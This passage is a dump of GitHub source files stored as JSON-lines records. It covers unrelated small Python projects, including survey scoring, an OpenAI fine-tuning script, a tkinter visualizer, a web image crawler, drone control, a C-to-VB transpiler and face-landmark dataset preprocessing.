answers',\n readonly=False,\n )\n is_evaluation = fields.Boolean(\n related='survey_id.is_evaluation',\n )\n\n @api.depends(\n 'score_ranges_ids',\n 'score_ranges_ids.score',\n 'score_calc_method',\n 'copy_labels_ids',\n 'copy_labels_ids.score',\n 'matrix_subtype',\n 'labels_ids_2',\n 'labels_ids_2.matrix_answer_score_ids',\n 'labels_ids_2.matrix_answer_score_ids.score',\n 'type',)\n def _compute_max_score(self):\n # TODO mejorar esto y ver porque se llama\n # varias veces a esta funcion *hay que cambiarlo tambien\n # en academic_reports que sobreescribimos esta funcion\n max_score = 0\n for question in self:\n if question.type == 'simple_choice':\n scores = [answer.score for answer in question.copy_labels_ids]\n max_score = max(scores if scores else [0])\n\n elif question.type == 'multiple_choice' and\\\n question.score_calc_method == 'direct_sum':\n max_score = sum(\n [answer.score for answer in question.copy_labels_ids\n if answer.score > 0])\n elif question.type == 'multiple_choice' and\\\n question.score_calc_method == 'ranges':\n scores = [score_range.score\n for score_range in question.score_ranges_ids]\n max_score = max(scores if scores else [0])\n\n elif question.type == 'numerical_box' and\\\n question.score_calc_method == 'direct_sum':\n max_score = question.validation_max_float_value\n elif question.type == 'numerical_box' and\\\n question.score_calc_method == 'ranges':\n scores = [score_range.score\n for score_range in question.score_ranges_ids]\n max_score = max(scores if scores else [0])\n\n elif question.type == 'matrix' and\\\n question.matrix_subtype == 'simple' and \\\n question.score_calc_method == 'direct_sum':\n for matrix_question in question.labels_ids_2:\n scores = [\n matrix_score.score\n for matrix_score in\n matrix_question.matrix_answer_score_ids]\n max_score += max(scores if scores else [0])\n elif question.type == 'matrix' and \\\n question.matrix_subtype == 'multiple' and \\\n question.score_calc_method == 'direct_sum':\n for matrix_question in question.labels_ids_2:\n max_score += sum(\n [matrix_score.score\n for matrix_score in\n matrix_question.matrix_answer_score_ids\n if matrix_score.score > 0])\n elif question.type == 'matrix' and \\\n question.score_calc_method == 'ranges':\n scores = [score_range.score\n for score_range in question.score_ranges_ids]\n max_score = max(scores if scores else [0])\n question.max_score = max_score\n","repo_name":"ingadhoc/survey","sub_path":"evaluation/models/survey_question.py","file_name":"survey_question.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"15397640029","text":"import openai\nimport os\nfrom dotenv import load_dotenv\n\ndef main():\n\tload_dotenv()\n\tprint (\"Starting Training...\")\n\tscript_directory = os.path.dirname(os.path.abspath(__file__))\n\trelative_training = \"training_data.jsonl\" \n\n\ttraining_path = os.path.join(script_directory, relative_training)\n\n\topenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\ttraining_response = openai.File.create(\n\t file=open(training_path, \"rb\"),\n\t purpose='fine-tune'\n\t)\n\n\ttraining_file_id = training_response[\"id\"]\n\n\tresponse = openai.FineTuningJob.create(\n\t\t\ttraining_file=training_file_id,\n\t\t\tmodel=\"gpt-3.5-turbo\",\n\t\t\tsuffix=\"lwfm_assistant\"\n\t)\n\n\tjob_id = response[\"id\"]\n\n\tprint(response)\n\n\tresponse = openai.FineTuningJob.list_events(id=job_id, limit=50)\n\n\tevents = response[\"data\"]\n\tevents.reverse()\n\n\tfor event in events:\n\t\tprint(\"EVENT MESSAGE: \" + event[\"message\"])\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"gr80mcbr/doc-reader","sub_path":"fine_tuner.py","file_name":"fine_tuner.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5705273983","text":"from tkinter import *\nfrom random import *\nimport time\n\n\nclass model(Frame):\n def __init__(self, q):\n super().__init__()\n self.get_graphics(q)\n\n\n def get_graphics(self, q):\n\n self.master.title(\"Plane\")\n self.pack(fill=BOTH, expand=1)\n canvas = Canvas(self, width=1450, height=310, bg=\"gray80\")\n\n x_help = 15\n y_help = 15\n for x in range(0, len(q)):\n for y in range(0, 7):\n if q[x][y] == \"0\":\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"salmon\")\n\n elif q[x][y] == \"1\":\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"cyan4\")\n\n elif q[x][y] == \"2\":\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"gray52\")\n\n else:\n if y == 3:\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray80\", fill=\"gray80\")\n\n else:\n canvas.create_rectangle(\n x_help + x * 42, y_help + y * 42, x_help + x * 42 + 35, y_help + y * 42 + 35,\n outline=\"gray0\", fill=\"azure\")\n\n canvas.pack(fill=BOTH, expand=1)\n\n\nroot = Tk()\nroot.geometry(\"1450x350\" + \"+\" + str(10) + \"+\" + str(50))\nroot.title(\"Plane\")\nroot.configure(bg='Snow')\nroot.resizable(width=False, height=False)\n\n\nf = open(\"data/simple_model_out/out_of_iteration_0.csv\", \"r\").readlines()\nfor i in range(0, len(f)):\n q = []\n for j in range(0, 34):\n w = []\n for k in range(0, 7):\n w.append(f[i][7 * j + k])\n q.append(w)\n print(q)\n win_1 = model(q).place(x = 0, y = 10)\n root.update()\n time.sleep(0.001)\n\nroot.mainloop()\n","repo_name":"bubashilda/IMMC","sub_path":"models/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22697154012","text":"\n\nTable = {}\ndef LCS_S(x,y,i,j):\n\t'''\n\tCalculates the length of the longest common subsequence of x[:i+1] and y[:j+1]\n\t'''\n\t\n\tif (i,j) not in Table:\n\t\tif i < 0 or j < 0 :\n\t\t\tTable[i,j] = 0\n\n\t\telif x[i] == y[j]:\n\t\t\tTable[i,j] = LCS_S(x,y,i-1,j-1) + 1\n\t\t\t\t\n\t\telse:\n\t\t\ts1 = LCS_S(x,y,i,j-1)\n\t\t\ts2 = LCS_S(x,y,i-1,j)\n\t\t\tTable[i,j] = max(s1,s2)\n\n\treturn Table[i,j]\n\n\n\n\nx = 'thecatruns'\ny = 'acatran'\nt = LCS_S(x,y,len(x)-1,len(y)-1)\nprint(t)\n\nimport util\nfor i in range(10):\n\tTable = {}\n\tx = util.random_str(100)\n\ty = util.random_str(100)\n\tt = LCS_S(x,y,len(x)-1,len(y)-1)\n\tprint(\"length:\",t)\n\n\n","repo_name":"milu-buet/ALGO-HW-6","sub_path":"Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43321747092","text":"import csv\nimport pandas as pd\n\nwith open(\"al_results_2020 (1).csv\", newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',')\n#need to chnage to dataframe\n exclude = ('Absent', '-', ' ', '')\n\n iter_csv = iter(csv_reader)\n for row in iter_csv:\n for row in csv_reader:\n if any(val in exclude for val in row):\n continue\n else:\n\n print(row)\n\nrow.to_csv('results.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"adenikea1/etl","sub_path":"al_results_code.py","file_name":"al_results_code.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19756728543","text":"class BankAccount:\r\n \r\n def __init__(self, idaccount_number, account_holder, initial_balance):\r\n if initial_balance < 500.00 :\r\n print(\"kont inisyal ou dwe depase 500 goud\")\r\n\r\n self.idaccount_number = idaccount_number\r\n self.account_holder = account_holder\r\n self.initial_balance = initial_balance\r\n\r\n def deposit(self,amount):\r\n self.initial_balance = self.initial_balance + amount\r\n \r\n\r\n def withdraw(self,amount):\r\n self.initial_balance = self.initial_balance - amount\r\n \r\n def get_balance(self):\r\n return self.initial_balance\r\n\r\n def __str__ (self):\r\n return \"Account number : {} \\n Account Holder : {}\\n balance : {} HTG\".format(self.idaccount_number,self.account_holder,self.initial_balance)\r\n\r\naccount1 = BankAccount(\"123456\",\"king bob\",10000)\r\naccount1.deposit(500.00)\r\naccount1.withdraw(200.00)\r\nbalance = account1.get_balance()\r\nprint(\"\\t\\t-----Account 1 :------\\n\",account1)\r\n\r\naccount2 = BankAccount(\"678942\",\"king Ragnar\",23000)\r\naccount2.deposit(13000)\r\naccount2.withdraw(2000)\r\nbalance = account2.get_balance()\r\nprint(\"\\t\\t-----Account 2 :------\\n\",account2)\r\n\r\naccount3 = BankAccount(\"652891\",\"Ivar the Bornless\",18000)\r\naccount3.deposit(14000)\r\naccount3.withdraw(5000)\r\nbalance = account3.get_balance()\r\nprint(\"\\t\\t-----Account 3 :------\\n\",account3)\r\n\r\naccount4 = BankAccount(\"652844\",\"Bjorn Cote de fer\",19000)\r\naccount4.deposit(14000)\r\naccount4.withdraw(5000)\r\nbalance = account4.get_balance()\r\nprint(\"\\t\\t-----Account 4 :------\\n\",account4)\r\n\r\n\r\n \r\n \r\n \r\n\r\n","repo_name":"RagnarBob/makendyalexis","sub_path":"Enonceklass.py","file_name":"Enonceklass.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43081164247","text":"import wx\nfrom IQDMPDF.file_processor import process_files\nfrom threading import Thread\nfrom pubsub import pub\nfrom os.path import isdir\nfrom iqdma.utilities import set_icon\n\n\nclass ProgressFrame(wx.Dialog):\n \"\"\"Create a window to display progress and begin provided worker\"\"\"\n\n def __init__(self, parent, options):\n wx.Dialog.__init__(self, None)\n self.parent = parent\n set_icon(self)\n\n self.text_ctrl = {\n \"scan\": wx.TextCtrl(self, wx.ID_ANY, \"\"),\n \"output\": wx.TextCtrl(self, wx.ID_ANY, \"\"),\n }\n\n self.button = {\n \"scan\": wx.Button(self, wx.ID_ANY, \"Browse\"),\n \"output\": wx.Button(self, wx.ID_ANY, \"Browse\"),\n \"exec\": wx.Button(self, wx.ID_ANY, \"Start\"),\n }\n self.button[\"exec\"].Disable()\n\n self.iqdm_pdf_kwargs = {\n \"ignore_extension\": options.PDF_IGNORE_EXT,\n \"processes\": options.PDF_N_JOBS,\n }\n\n self.gauge = wx.Gauge(self, wx.ID_ANY, 100)\n # self.gauge.Hide()\n self.label_progress = wx.StaticText(self, wx.ID_ANY, \"\")\n self.label_elapsed = wx.StaticText(self, wx.ID_ANY, \"\")\n self.label_remaining = wx.StaticText(self, wx.ID_ANY, \"\")\n\n self.__set_properties()\n self.__do_bind()\n self.__do_layout()\n self.__do_subscribe()\n\n self.Show()\n\n def __do_subscribe(self):\n pub.subscribe(self.update, \"progress_update\")\n\n def run(self):\n \"\"\"Initiate layout in GUI and begin thread\"\"\"\n # self.gauge.Show()\n self.button[\"exec\"].Disable()\n self.iqdm_pdf_kwargs[\"init_directory\"] = self.text_ctrl[\n \"scan\"\n ].GetValue()\n self.iqdm_pdf_kwargs[\"output_dir\"] = self.text_ctrl[\n \"output\"\n ].GetValue()\n\n for key in self.text_ctrl.keys():\n self.text_ctrl[key].Disable()\n self.button[key].Disable()\n\n self.label_progress.SetLabelText(\"Reading directory tree...\")\n self.Layout()\n ProgressFrameWorker(self.iqdm_pdf_kwargs)\n\n def callback(self, msg):\n wx.CallAfter(self.gauge.SetValue, int(msg.split(\"%|\")[0]))\n\n def __set_properties(self):\n self.SetMinSize((672, 100))\n self.SetTitle(\"IQDM-PDF\")\n\n def __do_bind(self):\n self.Bind(wx.EVT_CLOSE, self.close)\n self.Bind(\n wx.EVT_BUTTON, self.on_browse_scan, id=self.button[\"scan\"].GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_browse_output,\n id=self.button[\"output\"].GetId(),\n )\n self.Bind(\n wx.EVT_TEXT, self.enable_start, id=self.text_ctrl[\"scan\"].GetId()\n )\n self.Bind(\n wx.EVT_TEXT, self.enable_start, id=self.text_ctrl[\"output\"].GetId()\n )\n self.Bind(\n wx.EVT_BUTTON, self.on_button_exec, id=self.button[\"exec\"].GetId()\n )\n\n def __do_layout(self):\n\n sizer = {\n \"wrapper\": wx.BoxSizer(wx.VERTICAL),\n \"time\": wx.BoxSizer(wx.HORIZONTAL),\n \"exec\": wx.BoxSizer(wx.HORIZONTAL),\n }\n static_box_sizers = {\n \"scan\": (\"Scanning Directory\", wx.HORIZONTAL),\n \"output\": (\"Output Directory\", wx.HORIZONTAL),\n }\n for key, box in static_box_sizers.items():\n sizer[key] = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, box[0]), box[1]\n )\n\n for key, text_ctrl in self.text_ctrl.items():\n sizer[key].Add(self.text_ctrl[key], 1, wx.EXPAND | wx.ALL, 5)\n sizer[key].Add(self.button[key], 0, wx.ALL, 5)\n sizer[\"wrapper\"].Add(sizer[key], 0, wx.EXPAND | wx.ALL, 5)\n\n sizer[\"wrapper\"].Add(self.label_progress, 0, wx.TOP | wx.LEFT, 10)\n sizer[\"wrapper\"].Add(self.gauge, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)\n sizer[\"time\"].Add(self.label_elapsed, 1, wx.EXPAND | wx.LEFT, 10)\n sizer[\"time\"].Add(self.label_remaining, 0, wx.RIGHT, 10)\n sizer[\"wrapper\"].Add(sizer[\"time\"], 1, wx.EXPAND, 0)\n\n sizer[\"exec\"].Add((20, 20), 1, wx.EXPAND, 0)\n sizer[\"exec\"].Add(self.button[\"exec\"], 0, wx.EXPAND | wx.ALL, 5)\n sizer[\"wrapper\"].Add(sizer[\"exec\"], 0, wx.EXPAND | wx.ALL, 10)\n\n self.SetSizer(sizer[\"wrapper\"])\n self.Fit()\n self.Layout()\n self.Center()\n\n def browse(self, key, msg):\n dlg = wx.DirDialog(\n self,\n msg,\n \"\",\n style=wx.DD_DIR_MUST_EXIST | wx.DD_DEFAULT_STYLE,\n )\n\n if dlg.ShowModal() == wx.ID_OK:\n self.text_ctrl[key].SetValue(dlg.GetPath())\n dlg.Destroy()\n\n def on_browse_scan(self, *evt):\n self.browse(\"scan\", \"Select a Scanning Directory\")\n if not self.text_ctrl[\"output\"].GetValue():\n self.text_ctrl[\"output\"].SetValue(\n self.text_ctrl[\"scan\"].GetValue()\n )\n\n def on_browse_output(self, *evt):\n self.browse(\"output\", \"Select an Output Directory\")\n\n def enable_start(self, *evt):\n self.button[\"exec\"].Enable(\n isdir(self.text_ctrl[\"scan\"].GetValue())\n and isdir(self.text_ctrl[\"output\"].GetValue())\n )\n\n def on_button_exec(self, *evt):\n if self.button[\"exec\"].GetLabel() == \"Start\":\n self.run()\n else:\n self.close()\n\n def set_title(self, msg):\n wx.CallAfter(self.SetTitle, msg)\n\n def update(self, msg):\n if msg[\"gauge\"] == 1:\n self.button[\"exec\"].SetLabelText(\"Close\")\n self.button[\"exec\"].Enable()\n progress = f\"Processing File: {msg['progress']}\"\n elapsed = f\"Elapsed: {msg['elapsed']}\"\n remaining = f\"Est. Remaining: {msg['remaining']}\"\n if msg[\"progress\"]:\n wx.CallAfter(self.label_progress.SetLabelText, progress)\n elif msg[\"gauge\"] == 1:\n label = self.label_progress.GetLabel()\n if \"/\" in label:\n count = self.label_progress.GetLabel().split(\"/\")[1]\n label = f\"COMPLETE: Processed {count} file(s)\"\n else:\n label = \"COMPLETE\"\n wx.CallAfter(self.label_progress.SetLabelText, label)\n wx.CallAfter(self.label_remaining.SetLabelText, \"\")\n if msg[\"elapsed\"]:\n wx.CallAfter(self.label_elapsed.SetLabelText, elapsed)\n if msg[\"remaining\"]:\n wx.CallAfter(self.label_remaining.SetLabelText, remaining)\n wx.CallAfter(self.gauge.SetValue, int(100 * msg[\"gauge\"]))\n wx.CallAfter(self.Layout)\n\n def close(self, *evt):\n pub.unsubAll(topicName=\"progress_update\")\n self.parent.pdf_miner_window = None\n wx.CallAfter(self.Destroy)\n\n\nclass ProgressFrameWorker(Thread):\n \"\"\"Create a thread, perform action on each item in obj_list\"\"\"\n\n def __init__(self, iqdm_pdf_kwargs):\n Thread.__init__(self)\n self.iqdm_pdf_kwargs = iqdm_pdf_kwargs\n self.iqdm_pdf_kwargs[\"callback\"] = self.callback\n self.start()\n\n def run(self):\n process_files(**self.iqdm_pdf_kwargs)\n\n @staticmethod\n def callback(msg):\n gauge = 100 if msg == \"complete\" else int(msg.split(\"%|\")[0])\n if msg == \"complete\":\n progress = elapsed = remaining = \"\"\n else:\n progress = msg.split(\"| \")[1].split(\" \")[0]\n elapsed = msg.split(\"[\")[1].split(\"<\")[0]\n remaining = msg.split(\"<\")[1].split(\",\")[0]\n msg = {\n \"gauge\": gauge / 100.0,\n \"progress\": progress,\n \"elapsed\": elapsed,\n \"remaining\": remaining,\n }\n pub.sendMessage(\"progress_update\", msg=msg)\n","repo_name":"IQDM/IQDM-Analytics","sub_path":"iqdma/pdf_miner.py","file_name":"pdf_miner.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11613538946","text":"from .lexer import operators\n\nTRANS = {\n 'INT': 'Long', 'FLOAT': 'Single', 'DOUBLE': 'Double', 'STRING': 'string', 'BOOL': 'Boolean',\n 'LOGIC_AND': 'And', 'LOGIC_OR': 'Or', 'LOGIC_Not': 'Not',\n 'ARITHMETIC_AND': 'And', 'ARITHMETIC_OR': 'Or', 'ARITHMETIC_NOT': 'Not', 'XOR': 'Xor',\n 'PLUS': '+', 'MINUS': '-', 'NEG': '-', 'MUL': '*', 'MOD': 'Mod', 'DIV': '/', 'INTDIV': '\\\\',\n 'GET': '>=', 'LET': '<=', 'LT': '<', 'GT': '>', 'EQUAL': '=', 'NOT_EQUAL': '<>',\n}\n\n\nclass ASTnode(object):\n def __init__(self, type, value, childs):\n self.type = type\n self.value = value\n self.childs = []\n for i in childs:\n self.add_child(i)\n self.parent = self\n\n def add_child(self, node):\n node.parent = self\n self.childs.append(node)\n\n def __str__(self, r=0):\n ret = ' ' * r + self.type + ' ' + str(self.value) + '\\n'\n for i in self.childs:\n ret = ret + i.__str__(r+1)\n return ret\n\n def dot(self, prefix='n'):\n if prefix == 'n':\n return 'graph\\n{\\n%s}\\n' % self.dot(prefix='n0')\n ret = ' %s;\\n' % prefix + \\\n ' %s [label=\\\"%s\\\"]\\n' % (prefix, str(self.value))\n count = 0\n for i in self.childs:\n ret = \"%s %s -- %s\\n%s\" % (ret, prefix, prefix +\n str(count), i.dot(prefix=prefix + str(count)))\n count = count + 1\n return ret\n\n def vb(self, r=0, shift=' '):\n if self.type == 'IDENTIFIER':\n ret = self.value\n for i in self.childs[0].childs:\n ret = ret + '(%s)' % i.vb()\n return ret\n elif self.type == 'DECLARE':\n ret = ''\n for i in self.childs:\n if len(i.childs) == 1:\n ret = ret + \\\n '%s As %s, ' % (i.childs[0].vb(), TRANS[i.type])\n else:\n ret = ret + \\\n '%s As %s = %s, ' % (\n i.childs[0].vb(), TRANS[i.type], i.childs[1].vb())\n return shift*r + 'Dim ' + ret[0:-2] + '\\n'\n elif self.type == 'ARGSDECLARE':\n ret = ''\n for arg in self.childs:\n identifier = arg.childs[0].vb()\n ret = ret + '%s As %s, ' % (identifier, TRANS[arg.type])\n return ret[:-2]\n elif self.type == 'FUNCDECLARE':\n identifier = self.childs[0].vb()\n parameters = self.childs[1].vb()\n statements = self.childs[2].vb(r=r+1)\n if self.value == 'VOID':\n return 'Sub %s(%s)\\n%sEnd Sub\\n' % (identifier, parameters, statements)\n else:\n return 'Function %s(%s) As %s\\n%sEnd Function\\n' % (identifier, parameters, TRANS[self.value], statements)\n elif self.type == 'STATEMENT':\n return shift*r + self.childs[0].vb() + '\\n'\n elif self.type == 'STATEMENTS':\n ret = ''\n for i in self.childs:\n ret = ret + i.vb(r=r)\n return ret\n elif self.type == 'ASSIGN':\n return self.childs[0].vb() + ' = ' + self.childs[1].vb()\n elif self.type == 'ASSIGNS':\n ret = ''\n for assign in self.childs:\n ret = ret + assign.vb() + ': '\n return ret[:-2]\n elif self.type == 'IF':\n ret = shift*r + \\\n 'If %s Then\\n' % self.childs[0].vb() + self.childs[1].vb(r=r+1)\n if (len(self.childs) == 3):\n ret = ret + shift*r + 'Else\\n' + \\\n self.childs[2].vb(r=r+1)\n ret = ret + shift*r + 'End If\\n'\n return ret\n elif self.type == 'WHILE':\n print(self)\n return shift*r + 'Do While ' + self.childs[0].vb() + '\\n' + \\\n self.childs[1].vb(r=r+1) + \\\n shift*r + 'Loop\\n'\n elif self.type == 'FOR':\n self.type, self.value = 'WHILE', 'while'\n return shift*r + self.childs[0].vb() + ['', '\\n'][self.childs[0].type == 'ASSIGNS'] + \\\n shift*r + 'Do While ' + self.childs[1].vb() + '\\n' + \\\n self.childs[3].vb(r=r+1) + \\\n shift*(r+1) + self.childs[2].vb() + '\\n' + \\\n shift*r + 'Loop\\n'\n elif self.type == 'FUNCTIONCALL':\n identifier = self.childs[0].vb()\n if self.idt.ask(identifier) == 'VOID':\n ret = shift*r + identifier + ' ' + \\\n self.childs[1].vb() + '\\n'\n return ret\n else:\n ret = identifier + '(' + self.childs[1].vb() + ')'\n return ret\n elif self.type == 'ARGS':\n ret = ''\n for i in self.childs:\n ret = ret + i.vb() + ', '\n return ret[0:-2]\n elif self.type == 'CONST':\n ret = ''\n for i in self.childs:\n ret = ret + \\\n '%s As %s = %s, ' % (\n i.childs[0].vb(), TRANS[i.type], i.childs[1].vb())\n return 'Const ' + ret[0:-2] + '\\n'\n elif self.type == 'DIGIT_CONSTANT':\n return str(self.value)\n elif self.type == 'STRING_CONSTANT':\n return '\\\"%s\\\"' % self.value\n elif self.type == 'ROOT':\n ret = ''\n for i in self.childs:\n ret = ret + i.vb()\n return ret\n elif self.type == 'BREAK':\n loop = ''\n f = self.parent\n while True:\n if f.type == 'FOR':\n return shift*r + 'Exit For\\n'\n elif f.type == 'WHILE':\n return shift*r + 'Exit Do\\n'\n assert(self.type != 'ROOT')\n f = f.parent\n elif self.type == 'RETURN':\n p = self.parent\n while True:\n if p.type == 'FUNCDECLARE':\n if p.value == 'VOID':\n return shift*r + 'Exit Sub\\n'\n else:\n identifier = p.childs[0].vb()\n expr = self.childs[0].vb()\n return shift*r + identifier + ' = ' + expr + '\\n' + \\\n shift*r + 'Exit Function\\n'\n p = p.parent\n elif self.value in operators:\n if self.type in ['LOGIC_NOT', 'NEG', 'ARITHMETIC_NOT']:\n return TRANS[self.type]+self.childs[0].vb()\n else:\n return '('+self.childs[0].vb()+' '+TRANS[self.type]+' '+self.childs[1].vb()+')'\n","repo_name":"Gesrua/c2vb","sub_path":"c2vb/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"30444604262","text":"# from urllib import request\n\nimport urllib.request\nimport re\nimport requests\n#coding=utf-8\nimport time\nimport os\n\n\n\nclass WebCrawler():\n filepath = 'D:/WallPaper/'\n url = 'https://www.huya.com/g/4079'\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}\n \n root_pattern = '
  • '\n imgurl_pattern = '= 20:\n return False\n return True\n\n def disableArm(self):\n self.vehicle.armed = False\n time.sleep(1)\n return True\n\n def simple_start(self, height):\n print(\"Предполетные проверки\")\n if self.enableArm():\n print(\"Запускаем двигатели\")\n self.vehicle.mode = VehicleMode(\"GUIDED\")\n if self.vehicle.armed:\n time.sleep(3) # подождать!\n print(\"Взлет!\")\n self.vehicle.simple_takeoff(height) # взлететь!\n while self.vehicle.location.global_relative_frame.alt < height:\n print(\" Текущая высота: \", self.vehicle.location.global_relative_frame.alt)\n # Что бы не скучно было, смотрим как высоко уже поднялись\n time.sleep(1)\n self.simple_stop()\n print('Что-то поломалось! =(')\n return False\n\n def checkArrived(self, location, precision=0.3):\n veh_loc = self.vehicle.location.global_relative_frame\n d_lat = (location[0] - veh_loc.lat) * 1.113195e5\n d_lon = (location[1] - veh_loc.lon) * 1.113195e5\n d_alt = location[3] - veh_loc.alt\n if math.sqrt(d_lat ** 2 + d_lon ** 2 + d_alt ** 2) < precision:\n print(\"На месте\")\n return True\n return False\n\n def goToLocation(self, location):\n relative_location = LocationGlobalRelative(location[0], location[1],location[2])\n self.vehicle.simple_goto(relative_location)\n while not self.checkArrived(location):\n time.sleep(3)\n return True\n\n def startMission(self):\n pass\n\n def simple_stop(self):\n self.vehicle.mode = \"LAND\"\n if self.disableArm():\n print('done!!!')\n return True\n print('Что-то поломалось! =(')\n return False\n\n def goHome(self):\n self.vehicle.mode = VehicleMode(\"RTL\")\n return True\n\n\nimport os,sys\n\nsys.stderr = open(os.devnull, \"w\")\ntry:\n import psutil\n#except:\n #handle module not found\nfinally:\n sys.stderr = sys.__stderr__\n\n\ndrone = DroneLit_Base(True)\ndrone.simple_start(0.1)\ndrone.simple_stop()\ndrone.__del__()","repo_name":"azibf/SKAT","sub_path":"БРЭО/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19864403788","text":"from geometry.sphereGeometry import SphereGeometry\r\nfrom material.surfaceMaterial import SurfaceMaterial\r\nfrom core.mesh import Mesh\r\n\r\nclass PointLightHelper(Mesh):\r\n\r\n def __init__(self, pointLight, size=0.1, lineWidth=1):\r\n color = pointLight.color\r\n geometry = SphereGeometry(\r\n radius=size, radiusSegments=4, heightSegments=2)\r\n material = SurfaceMaterial({\r\n \"baseColor\": color,\r\n \"wireframe\": True,\r\n \"doubleSide\": True,\r\n \"lineWidth\": lineWidth\r\n })\r\n super().__init__(geometry, material)\r\n","repo_name":"EagleEatApple/pyside6gl","sub_path":"pygame/ch6/extras/pointLightHelper.py","file_name":"pointLightHelper.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"36541018435","text":"\"\"\"\n4.Write a program which accept one number form user and return addition of its factors.\nInput :12\nOutput : 16 \t(1+2+3+4+6)\n\"\"\"\n\n\n\ndef Add_of_Factors(iNo):\n\t\n\tif iNo < 0:\n\t\treturn -1;\n\tsum = 0;\n\tfor i in range(1,iNo//2+1):\n\t\tif iNo % i == 0:\n\t\t\tsum += i;\n\t\n\treturn sum;\n\ndef main():\n\t\n\tival = int(input(\"Enter val: \"));\n\tival = Add_of_Factors(ival);\n\t\n\tif ival == -1:\n\t\tprint(\"Invalid input\");\n\telse:\n\t\tprint(\"Addition of all Factors is : \",ival);\n\nif __name__ == \"__main__\":\n\tmain();\n","repo_name":"DilipBDabahde/PythonExample","sub_path":"Assignment_2/FactorsAddition.py","file_name":"FactorsAddition.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22635894647","text":"import logging\nimport os\nimport pickle as pkl\nimport random\nfrom multiprocessing import Pool\n\nimport PIL\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom face_alignment import FaceAlignment, LandmarksType\nfrom torch.utils.data import Dataset\n\nK = 8\n\n\ndef preprocess_dataset(source, output, device='cpu', size=0, overwrite=False):\n logging.info('===== DATASET PRE-PROCESSING =====')\n logging.info(f'Running on {device.upper()}.')\n logging.info(f'Saving K+1 random frames from each video (K = {K}).')\n fa = FaceAlignment(LandmarksType._2D, device=device)\n\n video_list = get_video_list(source, size, output, overwrite=overwrite)\n\n logging.info(f'Processing {len(video_list)} videos...')\n\n init_pool(fa, output)\n counter = 1\n for v in video_list:\n process_video_folder(v)\n logging.info(f'{counter}/{len(video_list)}')\n counter += 1\n\n logging.info(f'All {len(video_list)} videos processed.')\n\n\ndef get_video_list(source, size, output, overwrite=True):\n already_processed = []\n if not overwrite:\n already_processed = [\n os.path.splitext(video_id)[0]\n for root, dirs, files in os.walk(output)\n for video_id in files\n ]\n\n video_list = []\n counter = 0\n for root, dirs, files in os.walk(source):\n if len(files) > 0 and os.path.basename(os.path.normpath(root)) not in already_processed:\n assert contains_only_videos(files) and len(dirs) == 0\n video_list.append((root, files))\n counter += 1\n if 0 < size <= counter:\n break\n\n return video_list\n\n\ndef init_pool(face_alignment, output):\n global _FA\n _FA = face_alignment\n global _OUT_DIR\n _OUT_DIR = output\n\n\ndef process_video_folder(video):\n folder, files = video\n\n try:\n assert contains_only_videos(files)\n frames = np.concatenate([extract_frames(os.path.join(folder, f)) for f in files])\n\n save_video(\n frames=select_random_frames(frames),\n video_id=os.path.basename(os.path.normpath(folder)),\n path=_OUT_DIR,\n face_alignment=_FA\n )\n except Exception as e:\n logging.error(f'Video {os.path.basename(os.path.normpath(folder))} could not be processed:\\n{e}')\n\n\ndef contains_only_videos(files, extension='.mp4'):\n \"\"\"\n Checks whether the files provided all end with the specified video extension.\n :param files: List of file names.\n :param extension: Extension that all files should have.\n :return: True if all files end with the given extension.\n \"\"\"\n return len([x for x in files if os.path.splitext(x)[1] != extension]) == 0\n\n\ndef extract_frames(video):\n cap = cv2.VideoCapture(video)\n\n n_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n frames = np.empty((n_frames, h, w, 3), 